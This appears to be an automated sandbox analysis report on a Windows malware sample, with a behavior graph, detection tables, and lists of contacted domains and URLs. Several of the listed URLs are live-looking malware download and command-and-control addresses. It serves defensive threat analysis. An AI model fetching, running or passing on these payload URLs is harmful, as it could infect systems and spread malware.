                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 547895 Sample: nkINykHreE.exe Startdate: 04/01/2022 Architecture: WINDOWS Score: 100 91 116.202.186.120, 49898, 80 HETZNER-ASDE Germany 2->91 93 65.108.180.72, 49897, 80 ALABANZA-BALTUS United States 2->93 95 8 other IPs or domains 2->95 129 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->129 131 Multi AV Scanner detection for domain / URL 2->131 133 Antivirus detection for URL or domain 2->133 135 15 other signatures 2->135 11 nkINykHreE.exe 2->11         started        14 sdiimdop.exe 2->14         started        16 haifbcd 2->16         started        18 8 other processes 2->18 signatures3 process4 dnsIp5 173 Contains functionality to inject code into remote processes 11->173 175 Injects a PE file into a foreign processes 11->175 21 nkINykHreE.exe 11->21         started        177 Detected unpacking (changes PE section rights) 14->177 179 Detected unpacking (overwrites its own PE header) 14->179 181 Writes to foreign memory regions 14->181 183 Allocates memory in foreign processes 14->183 24 svchost.exe 14->24         started        185 Machine Learning detection for dropped file 16->185 27 haifbcd 16->27         started        97 127.0.0.1 unknown unknown 18->97 187 Changes security center settings (notifications, updates, antivirus, firewall) 18->187 189 Maps a DLL or memory area into another process 18->189 191 Checks if the current machine is a virtual machine (disk enumeration) 18->191 193 Creates a thread in another existing process (thread injection) 18->193 29 MpCmdRun.exe 18->29         started        signatures6 process7 dnsIp8 137 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->137 139 Maps a DLL or memory area into another process 21->139 141 Checks if the current machine is a virtual machine (disk enumeration) 21->141 31 explorer.exe 10 21->31 injected 107 patmushta.info 194.87.235.183, 443, 49814, 49904 MTW-ASRU Russian Federation 24->107 109 microsoft-com.mail.protection.outlook.com 40.93.207.1, 25, 49813 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->109 111 192.168.2.1 unknown unknown 24->111 143 System process connects to network (likely due to code injection or exploit) 24->143 145 Creates a thread in another existing process (thread injection) 27->145 36 conhost.exe 29->36         started        signatures9 process10 dnsIp11 115 amogohuigotuli.at 31->115 117 185.233.81.115, 443, 49777, 49778 SUPERSERVERSDATACENTERRU Russian Federation 31->117 119 26 other IPs or domains 31->119 75 C:\Users\user\AppData\Roaming\scifbcd, PE32 31->75 dropped 77 C:\Users\user\AppData\Roaming\haifbcd, PE32 31->77 dropped 79 C:\Users\user\AppData\Local\Temp\CBA.exe, PE32 31->79 dropped 81 12 other files (11 malicious) 31->81 dropped 121 System process connects to network (likely due to code injection or exploit) 31->121 123 Benign windows process drops PE files 31->123 125 Deletes itself after installation 31->125 127 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->127 38 2757.exe 31->38         started        43 18D.exe 2 31->43         started        45 2997.exe 31->45         started        47 3 other processes 31->47 file12 signatures13 process14 dnsIp15 99 185.7.214.239, 49847, 49876, 49906 DELUNETDE France 38->99 85 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 38->85 dropped 87 C:\ProgramData\sqlite3.dll, PE32 38->87 dropped 147 Query firmware table information (likely to detect VMs) 38->147 149 Tries to detect sandboxes and other dynamic analysis tools (window names) 38->149 151 Machine Learning detection for dropped file 38->151 171 4 other signatures 38->171 89 C:\Users\user\AppData\Local\...\sdiimdop.exe, PE32 43->89 dropped 153 Detected unpacking (changes PE section rights) 43->153 155 Detected unpacking (overwrites its own PE header) 43->155 157 Uses netsh to modify the Windows network and firewall settings 43->157 159 Modifies the windows firewall 43->159 49 cmd.exe 1 43->49         started        52 cmd.exe 2 43->52         started        54 sc.exe 1 43->54         started        61 3 other processes 43->61 161 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 45->161 163 Maps a DLL or memory area into another process 45->163 165 Checks if the current machine is a virtual machine (disk enumeration) 45->165 167 Creates a thread in another existing process (thread injection) 45->167 101 91.219.236.18, 80 SERVERASTRA-ASHU Hungary 47->101 103 194.180.174.41 MIVOCLOUDMD unknown 47->103 105 194.180.174.53, 80 MIVOCLOUDMD unknown 47->105 169 Injects a PE file into a foreign processes 47->169 56 CBA.exe 47->56         started        59 115B.exe 47->59         started        file16 signatures17 process18 dnsIp19 83 C:\Windows\SysWOW64\...\sdiimdop.exe (copy), PE32 49->83 dropped 63 conhost.exe 49->63         started        65 conhost.exe 52->65         started        67 conhost.exe 54->67         started        113 86.107.197.138, 38133, 49846 MOD-EUNL Romania 56->113 69 conhost.exe 61->69         started        71 conhost.exe 61->71         started        73 conhost.exe 61->73         started        file20 process21

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nkINykHreE.exe25%VirustotalBrowse
                      nkINykHreE.exe26%ReversingLabs
                      nkINykHreE.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\115B.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\scifbcd100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\CBA.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\4187.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\18D.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2997.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\315E.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\4BED.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\1B15.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\28C2.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\4583.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\haifbcd100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\sdiimdop.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2757.exe100%Joe Sandbox ML
                      C:\ProgramData\sqlite3.dll3%MetadefenderBrowse
                      C:\ProgramData\sqlite3.dll0%ReversingLabs

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.2.nkINykHreE.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.nkINykHreE.exe.5415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.2997.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.0.haifbcd.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.0.2757.exe.1150000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.0.2757.exe.1150000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      31.2.sdiimdop.exe.540e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      31.3.sdiimdop.exe.570000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.3.2997.exe.5d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      34.2.svchost.exe.2bb0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      31.2.sdiimdop.exe.600000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                      15.0.haifbcd.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.1.nkINykHreE.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.0.2757.exe.1150000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.3.18D.exe.560000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.1.haifbcd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.2.2757.exe.1150000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      16.0.115B.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.nkINykHreE.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.18D.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      1.0.nkINykHreE.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      38.3.scifbcd.5e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.1.115B.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.115B.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.115B.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      38.2.scifbcd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.2997.exe.5c0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.haifbcd.4715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.haifbcd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      38.2.scifbcd.5d0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.1.2757.exe.1150000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.0.2757.exe.1150000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      39.3.2757.exe.1070000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.18D.exe.540e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      31.2.sdiimdop.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      14.2.115B.exe.4715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.nkINykHreE.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.0.haifbcd.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.2.4187.exe.400000.0.unpack100%AviraHEUR/AGEN.1127993Download File
                      16.2.115B.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://65.108.180.72/msvcp140.dll10%VirustotalBrowse
                      http://65.108.180.72/msvcp140.dll100%Avira URL Cloudmalware
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://91.243.44.130/stlr/maps.exe9%VirustotalBrowse
                      http://91.243.44.130/stlr/maps.exe100%Avira URL Cloudmalware
                      http://65.108.180.72/mozglue.dll11%VirustotalBrowse
                      http://65.108.180.72/mozglue.dll100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://91.219.236.18/capibarl100%Avira URL Cloudphishing
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://65.108.180.72/7060%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://185.7.214.239/sqlite3.dll0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://194.180.174.41/0%Avira URL Cloudsafe
                      http://privacytools-foryou-777.com/downloads/toolspab2.exe100%Avira URL Cloudmalware
                      http://91.219.236.148/capibarN0%Avira URL Cloudsafe
                      http://116.202.186.120/vcruntime140.dll0%Avira URL Cloudsafe
                      http://65.108.180.72/freebl3.dll100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/8584_1641133152_551.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/2184_1641247228_8717.exe100%Avira URL Cloudmalware
                      http://91.219.236.148/capibarl0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                      http://185.7.214.239/POeNDXYchB.php0%Avira URL Cloudsafe
                      http://91.219.236.148/capibarg0%Avira URL Cloudsafe
                      http://91.219.236.18/3100%Avira URL Cloudphishing
                      http://194.180.174.53/capibar0100%Avira URL Cloudphishing
                      http://unic11m.top/install1.exe100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id22Response0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.mediafire.com
                      		104.16.203.237
                      		truefalse
                        		high
                        kent0mushinec0n3t.casacam.net
                        		95.143.179.186
                        		truefalse
                          		high
                          bitly.com
                          		67.199.248.15
                          		truefalse
                            		high
                            patmushta.info
                            		194.87.235.183
                            		truefalse
                              		high
                              cdn.discordapp.com
                              		162.159.135.233
                              		truefalse
                                		high
                                mstdn.social
                                		116.202.14.219
                                		truefalse
                                  		high
                                  natribu.org
                                  		178.248.232.78
                                  		truefalse
                                    		high
                                    unicupload.top
                                    		54.38.220.85
                                    		truefalse
                                      		high
                                      qoto.org
                                      		51.91.13.105
                                      		truefalse
                                        		high
                                        amogohuigotuli.at
                                        		152.0.118.227
                                        		truefalse
                                          		high
                                          host-data-coin-11.com
                                          		89.223.65.17
                                          		truefalse
                                            		high
                                            bit.ly
                                            		67.199.248.11
                                            		truefalse
                                              		high
                                              f0616073.xsph.ru
                                              		141.8.193.236
                                              		truefalse
                                                		high
                                                f0616068.xsph.ru
                                                		141.8.193.236
                                                		truefalse
                                                  		high
                                                  microsoft-com.mail.protection.outlook.com
                                                  		40.93.207.1
                                                  		truefalse
                                                    		high
                                                    f0616071.xsph.ru
                                                    		141.8.193.236
                                                    		truefalse
                                                      		high
                                                      goo.su
                                                      		172.67.139.105
                                                      		truefalse
                                                        		high
                                                        transfer.sh
                                                        		144.76.136.153
                                                        		truefalse
                                                          		high
                                                          privacytools-foryou-777.com
                                                          		89.223.65.17
                                                          		truefalse
                                                            		high
                                                            data-host-coin-8.com
                                                            		89.223.65.17
                                                            		truefalse
                                                              		high
                                                              unic11m.top
                                                              		54.38.220.85
                                                              		truefalse
                                                                		high
                                                                vk.com
                                                                		87.240.190.72
                                                                		truefalse
                                                                  		high
                                                                  srtuiyhuali.at
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    fufuiloirtu.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high

                                                                      Contacted URLs

                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      http://185.7.214.171:8080/6.phptrue
                                                                      • URL Reputation: malware
                                                                      		unknown
                                                                      http://65.108.180.72/msvcp140.dlltrue
                                                                      • 10%, Virustotal, Browse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://91.243.44.130/stlr/maps.exetrue
                                                                      • 9%, Virustotal, Browse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://65.108.180.72/mozglue.dlltrue
                                                                      • 11%, Virustotal, Browse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://65.108.180.72/706true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://185.7.214.239/sqlite3.dllfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://privacytools-foryou-777.com/downloads/toolspab2.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://116.202.186.120/vcruntime140.dlltrue
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://65.108.180.72/freebl3.dlltrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://data-host-coin-8.com/files/8584_1641133152_551.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://data-host-coin-8.com/game.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://data-host-coin-8.com/files/2184_1641247228_8717.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://185.7.214.239/POeNDXYchB.phpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://f0616073.xsph.ru/Music.exefalse
                                                                        		high
                                                                        http://unic11m.top/install1.exetrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://f0616068.xsph.ru/crp.exefalse
                                                                          		high

                                                                          URLs from Memory and Binaries

                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id12ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://t.me/capibar4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://tempuri.org/Entity/Id2ResponseCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id21ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Entity/Id15ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.ip.sb/ipCBA.exe, 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, CBA.exe, 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://91.219.236.18/capibarl4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmptrue
                                                                                                                • Avira URL Cloud: phishing
                                                                                                                		unknown
                                                                                                                http://crl.ver)svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id24ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dynamic.tsvchost.exe, 00000007.00000003.305141180.000001A732064000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id5ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Entity/Id10ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id8ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://194.180.174.41/4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentityCBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://91.219.236.148/capibarN4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/06/addressingexCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://91.219.236.148/capibarl4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://tempuri.org/Entity/Id13ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
